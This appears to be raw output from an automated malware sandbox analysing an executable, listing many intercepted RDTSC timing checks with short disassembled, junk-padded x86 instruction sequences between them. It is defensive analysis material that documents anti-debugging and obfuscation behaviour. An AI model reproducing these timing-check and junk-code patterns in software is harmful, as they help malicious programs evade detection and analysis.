                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: AB5C7A second address: AB5C83 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: AB5C83 second address: AB5C87 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: A666E7 second address: A66704 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5D20D3D697h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: A66704 second address: A66715 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 push eax 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a pushad 0x0000000b popad 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: A66715 second address: A66719 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: A66719 second address: A6673E instructions: 0x00000000 rdtsc 0x00000002 jg 00007F5D20C24756h 0x00000008 jng 00007F5D20C24756h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jg 00007F5D20C24756h 0x00000018 jmp 00007F5D20C2475Dh 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: A6673E second address: A66742 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: AB8EED second address: AB8F70 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jnp 00007F5D20C2475Ch 0x0000000b popad 0x0000000c push eax 0x0000000d push ecx 0x0000000e push ecx 0x0000000f jmp 00007F5D20C2475Bh 0x00000014 pop ecx 0x00000015 pop ecx 0x00000016 nop 0x00000017 push 00000000h 0x00000019 push ebx 0x0000001a call 00007F5D20C24758h 0x0000001f pop ebx 0x00000020 mov dword ptr [esp+04h], ebx 0x00000024 add dword ptr [esp+04h], 00000014h 0x0000002c inc ebx 0x0000002d push ebx 0x0000002e ret 0x0000002f pop ebx 0x00000030 ret 0x00000031 push 00000000h 0x00000033 jnl 00007F5D20C2475Ch 0x00000039 push 00000000h 0x0000003b push 00000000h 0x0000003d push edx 0x0000003e call 00007F5D20C24758h 0x00000043 pop edx 0x00000044 mov dword ptr [esp+04h], edx 0x00000048 add dword ptr [esp+04h], 00000019h 0x00000050 inc edx 0x00000051 push edx 0x00000052 ret 0x00000053 pop edx 0x00000054 ret 0x00000055 jmp 00007F5D20C2475Dh 0x0000005a push eax 0x0000005b push ebx 0x0000005c push eax 0x0000005d push edx 0x0000005e push eax 0x0000005f pop eax 0x00000060 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: AB8232 second address: AB8236 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: AB9F30 second address: AB9F45 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5D20C24760h 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: AB90C4 second address: AB90CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 push edi 0x00000008 pop edi 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: ABAEDA second address: ABAEE7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jne 00007F5D20C24756h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: ABAEE7 second address: ABAF3C instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 jmp 00007F5D20D3D68Ch 0x0000000d nop 0x0000000e push 00000000h 0x00000010 push ebp 0x00000011 call 00007F5D20D3D688h 0x00000016 pop ebp 0x00000017 mov dword ptr [esp+04h], ebp 0x0000001b add dword ptr [esp+04h], 00000017h 0x00000023 inc ebp 0x00000024 push ebp 0x00000025 ret 0x00000026 pop ebp 0x00000027 ret 0x00000028 sbb ebx, 591A26EEh 0x0000002e push 00000000h 0x00000030 push edx 0x00000031 mov bl, ah 0x00000033 pop ebx 0x00000034 sub dword ptr [ebp+122D1935h], eax 0x0000003a push 00000000h 0x0000003c or edi, dword ptr [ebp+122D337Eh] 0x00000042 xchg eax, esi 0x00000043 pushad 0x00000044 pushad 0x00000045 push ecx 0x00000046 pop ecx 0x00000047 push eax 0x00000048 push edx 0x00000049 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: ABAF3C second address: ABAF49 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jc 00007F5D20C2475Ch 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: ABAF49 second address: ABAF5A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 jbe 00007F5D20D3D690h 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: ABA0A7 second address: ABA135 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnl 00007F5D20C2475Ch 0x0000000c popad 0x0000000d nop 0x0000000e push 00000000h 0x00000010 push edi 0x00000011 call 00007F5D20C24758h 0x00000016 pop edi 0x00000017 mov dword ptr [esp+04h], edi 0x0000001b add dword ptr [esp+04h], 0000001Ch 0x00000023 inc edi 0x00000024 push edi 0x00000025 ret 0x00000026 pop edi 0x00000027 ret 0x00000028 mov dword ptr [ebp+122D3769h], esi 0x0000002e push dword ptr fs:[00000000h] 0x00000035 sub ebx, dword ptr [ebp+122D2AD1h] 0x0000003b mov dword ptr fs:[00000000h], esp 0x00000042 push 00000000h 0x00000044 push ebx 0x00000045 call 00007F5D20C24758h 0x0000004a pop ebx 0x0000004b mov dword ptr [esp+04h], ebx 0x0000004f add dword ptr [esp+04h], 00000018h 0x00000057 inc ebx 0x00000058 push ebx 0x00000059 ret 0x0000005a pop ebx 0x0000005b ret 0x0000005c mov bx, ax 0x0000005f mov edi, dword ptr [ebp+122D1943h] 0x00000065 mov eax, dword ptr [ebp+122D041Dh] 0x0000006b mov bh, 86h 0x0000006d push FFFFFFFFh 0x0000006f nop 0x00000070 push eax 0x00000071 push edx 0x00000072 pushad 0x00000073 push esi 0x00000074 pop esi 0x00000075 push eax 0x00000076 pop eax 0x00000077 popad 0x00000078 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: ABBE71 second address: ABBE75 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: ABBE75 second address: ABBE7B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: ABBE7B second address: ABBE8E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5D20D3D68Fh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: ABB17A second address: ABB180 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: ABDD15 second address: ABDD1A instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: ABDD1A second address: ABDDA5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push eax 0x0000000d call 00007F5D20C24758h 0x00000012 pop eax 0x00000013 mov dword ptr [esp+04h], eax 0x00000017 add dword ptr [esp+04h], 0000001Ah 0x0000001f inc eax 0x00000020 push eax 0x00000021 ret 0x00000022 pop eax 0x00000023 ret 0x00000024 mov dword ptr [ebp+122D21D5h], esi 0x0000002a push 00000000h 0x0000002c mov bx, F4E5h 0x00000030 push 00000000h 0x00000032 push 00000000h 0x00000034 push esi 0x00000035 call 00007F5D20C24758h 0x0000003a pop esi 0x0000003b mov dword ptr [esp+04h], esi 0x0000003f add dword ptr [esp+04h], 0000001Dh 0x00000047 inc esi 0x00000048 push esi 0x00000049 ret 0x0000004a pop esi 0x0000004b ret 0x0000004c jmp 00007F5D20C24763h 0x00000051 push eax 0x00000052 pushad 0x00000053 push eax 0x00000054 push edx 0x00000055 jmp 00007F5D20C24765h 0x0000005a rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: ABDDA5 second address: ABDDA9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: ABCF2F second address: ABCF33 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: ABCF33 second address: ABCFC3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 mov dword ptr [esp], eax 0x0000000a clc 0x0000000b push dword ptr fs:[00000000h] 0x00000012 push 00000000h 0x00000014 push edx 0x00000015 call 00007F5D20D3D688h 0x0000001a pop edx 0x0000001b mov dword ptr [esp+04h], edx 0x0000001f add dword ptr [esp+04h], 00000018h 0x00000027 inc edx 0x00000028 push edx 0x00000029 ret 0x0000002a pop edx 0x0000002b ret 0x0000002c or dword ptr [ebp+1247653Ch], edi 0x00000032 mov dword ptr fs:[00000000h], esp 0x00000039 push 00000000h 0x0000003b push ebx 0x0000003c call 00007F5D20D3D688h 0x00000041 pop ebx 0x00000042 mov dword ptr [esp+04h], ebx 0x00000046 add dword ptr [esp+04h], 0000001Bh 0x0000004e inc ebx 0x0000004f push ebx 0x00000050 ret 0x00000051 pop ebx 0x00000052 ret 0x00000053 mov eax, dword ptr [ebp+122D175Dh] 0x00000059 push edx 0x0000005a mov dword ptr [ebp+12456339h], eax 0x00000060 pop edi 0x00000061 push FFFFFFFFh 0x00000063 mov ebx, 4626FD17h 0x00000068 nop 0x00000069 push eax 0x0000006a push edx 0x0000006b jmp 00007F5D20D3D696h 0x00000070 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: ABCFC3 second address: ABCFC9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: ABCFC9 second address: ABCFCD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: ABCFCD second address: ABCFEF instructions: 0x00000000 rdtsc 0x00000002 jg 00007F5D20C24756h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F5D20C24762h 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: ABED90 second address: ABED95 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: ABED95 second address: ABEDA0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jl 00007F5D20C24756h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: ABEDA0 second address: ABEE04 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push edi 0x0000000d call 00007F5D20D3D688h 0x00000012 pop edi 0x00000013 mov dword ptr [esp+04h], edi 0x00000017 add dword ptr [esp+04h], 0000001Bh 0x0000001f inc edi 0x00000020 push edi 0x00000021 ret 0x00000022 pop edi 0x00000023 ret 0x00000024 and di, A5E4h 0x00000029 push 00000000h 0x0000002b push 00000000h 0x0000002d push ebx 0x0000002e call 00007F5D20D3D688h 0x00000033 pop ebx 0x00000034 mov dword ptr [esp+04h], ebx 0x00000038 add dword ptr [esp+04h], 00000019h 0x00000040 inc ebx 0x00000041 push ebx 0x00000042 ret 0x00000043 pop ebx 0x00000044 ret 0x00000045 push 00000000h 0x00000047 xor dword ptr [ebp+122D18F3h], eax 0x0000004d push eax 0x0000004e push eax 0x0000004f push edx 0x00000050 push eax 0x00000051 push edx 0x00000052 pushad 0x00000053 popad 0x00000054 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: ABEE04 second address: ABEE08 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: ABDF3D second address: ABDF43 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: ABEE08 second address: ABEE0E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: AC0136 second address: AC013A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: AC1D06 second address: AC1D10 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jno 00007F5D20C24756h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: AC1D10 second address: AC1D14 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: AC0E92 second address: AC0E9C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: AC0E9C second address: AC0EA0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: AC0EA0 second address: AC0EC8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5D20C24769h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b push ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e jng 00007F5D20C24756h 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: AC0F6C second address: AC0F78 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push esi 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: AC0F78 second address: AC0F7C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: AC0F7C second address: AC0F80 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: AC1E8F second address: AC1E99 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F5D20C24756h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: AC1E99 second address: AC1E9F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: AC1E9F second address: AC1EA3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: AC1EA3 second address: AC1F09 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d pushad 0x0000000e popad 0x0000000f popad 0x00000010 jmp 00007F5D20D3D699h 0x00000015 popad 0x00000016 nop 0x00000017 jmp 00007F5D20D3D68Ah 0x0000001c push dword ptr fs:[00000000h] 0x00000023 movsx ebx, ax 0x00000026 mov dword ptr fs:[00000000h], esp 0x0000002d push ebx 0x0000002e cmc 0x0000002f pop ebx 0x00000030 mov eax, dword ptr [ebp+122D0CF1h] 0x00000036 mov dword ptr [ebp+122D33E3h], edx 0x0000003c cmc 0x0000003d push FFFFFFFFh 0x0000003f push eax 0x00000040 pushad 0x00000041 js 00007F5D20D3D688h 0x00000047 push ebx 0x00000048 pop ebx 0x00000049 push eax 0x0000004a push edx 0x0000004b push ebx 0x0000004c pop ebx 0x0000004d rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: AC1F09 second address: AC1F0D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: AC5EBA second address: AC5ECB instructions: 0x00000000 rdtsc 0x00000002 jng 00007F5D20D3D688h 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: AC5ECB second address: AC5EF5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F5D20C24756h 0x0000000a pushad 0x0000000b popad 0x0000000c jmp 00007F5D20C24761h 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F5D20C2475Ah 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: AC5EF5 second address: AC5EFD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: AC5EFD second address: AC5F02 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: AC5F02 second address: AC5F10 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push ecx 0x00000006 jl 00007F5D20D3D686h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: ACDEBD second address: ACDECE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5D20C2475Ch 0x00000007 push ebx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: ACD761 second address: ACD775 instructions: 0x00000000 rdtsc 0x00000002 je 00007F5D20D3D686h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jnl 00007F5D20D3D686h 0x00000012 push eax 0x00000013 pop eax 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: ACD775 second address: ACD78E instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F5D20C2475Dh 0x0000000f push ecx 0x00000010 pop ecx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: ACD78E second address: ACD7B1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F5D20D3D698h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: ACD7B1 second address: ACD7CD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnc 00007F5D20C24756h 0x00000009 jmp 00007F5D20C24761h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: ACD910 second address: ACD916 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: ACD916 second address: ACD91A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: ACD91A second address: ACD927 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: AD23A8 second address: AD23C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 pushad 0x00000009 jno 00007F5D20C2475Ch 0x0000000f push eax 0x00000010 push edx 0x00000011 jns 00007F5D20C24756h 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: AD23C5 second address: AD23C9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: AD25CA second address: AD25CE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: AD25CE second address: AD25D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: AD25D9 second address: AD25E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push edi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: AD25E5 second address: AD25EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: AD3E73 second address: AD3E8D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5D20C24766h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: AD3E8D second address: AD3E97 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: AD3E97 second address: AD3E9B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: AD3E9B second address: AD3E9F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: A64BEE second address: A64BF3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: A64BF3 second address: A64BF8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: A64BF8 second address: A64BFE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: AD9FF2 second address: AD9FF8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: A69E1B second address: A69E3C instructions: 0x00000000 rdtsc 0x00000002 ja 00007F5D20C24756h 0x00000008 jbe 00007F5D20C24756h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push esi 0x00000011 jmp 00007F5D20C2475Ah 0x00000016 pop esi 0x00000017 popad 0x00000018 push ebx 0x00000019 push ecx 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: AD9461 second address: AD9466 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
